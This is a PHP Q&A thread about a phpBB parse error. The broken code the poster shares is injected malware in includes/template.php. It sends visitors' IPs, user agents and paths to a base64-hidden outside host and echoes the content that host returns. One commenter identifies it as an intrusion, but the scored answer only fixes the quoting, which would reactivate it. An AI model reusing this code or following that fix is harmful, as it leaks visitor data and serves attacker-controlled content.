# Error related to phpbb forum - Parse error: syntax error, unexpected T_STRING

Tags: php, phpbb

```
Parse error: syntax error, unexpected T_STRING in /home/yahooda7/public_html/errorkode.com/includes/template.php on line 236
```

The website www.errorkode.com is working fine. All of a sudden i am getting above error now. How to solve this error. I dont have knowledge in php. Pls help me.

```
    function display($handle, $include_once = true)
    {
        global $user, $phpbb_hook;

        if (!empty($phpbb_hook) && $phpbb_hook->call_hook(array(__CLASS__, __FUNCTION__), $handle, $include_once, $this))
        {
            if ($phpbb_hook->hook_return(array(__CLASS__, __FUNCTION__)))
            {
                return $phpbb_hook->hook_return_result(array(__CLASS__, __FUNCTION__));
            }
        }

        if (defined('IN_ERROR_HANDLER'))
        {
            if ((E_NOTICE & error_reporting()) == E_NOTICE)
            {
                error_reporting(error_reporting() ^ E_NOTICE);
            }
        }

        if ($filename = $this->_tpl_load($handle))
        {
            ($include_once) ? include_once($filename) : include($filename);
        }
        else
        {
            eval(' ?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    // Below line is 236
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>' . $this->compiled_code[$handle] . '<?php ');
        }

        return true;
    }
```

I added the code and mentioned 236 line in comments pls check.

Comment: There's an error on line 236 of `includes/template.php`. If you paste it into the question, we might be able to tell you how to fix it.

Comment: @andrewsi Hello, I updated the code. pls check it. I added line no. in comments.

Comment: Well, the problem is that you're using single quotes both to delimit the start and end of your `eval` statement, and inside it, for the array key in `$_SERVER['HTTP_USER_AGENT']` and others. You just need to escape the single quotes inside your string.

Comment: @andrewsi i removed those single quotes. but still same error.

Comment: If it's not code you want there, you can remove that whole `eval` call.

Comment: @andrewsi thank u. it worked. should i keep that else statement or can i remove that also.

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/32904/discussion-between-s-k-r-and-andrewsi)

Comment: You can remove the else, if it's empty. You should probably start looking through your logs to see if you can work out how the code got there - given that it was edited into the middle of a PHP file, I'd suggest that it was added by someone who had very high level to your server, which means there's a serious hole somewhere. Unfortunately, I can't help much more than that - maybe your hosting provider could offer a few ideas?

Comment: @andrewsi thank you so much. I will work on that.

Answer (score 0):

Your eval is broken:

```
eval(' ?><?php
     ^--- beginning of string
    ...snip...
    $sUserAgent = strtolower($_SERVER['HTTP etc...
                                      ^---end of string
```

Any quotes inside the eval must be escaped, e.g.

```
$sUserAgent = strtolower($_SERVER[\'HTTP etc..
                                  ^---- escape
```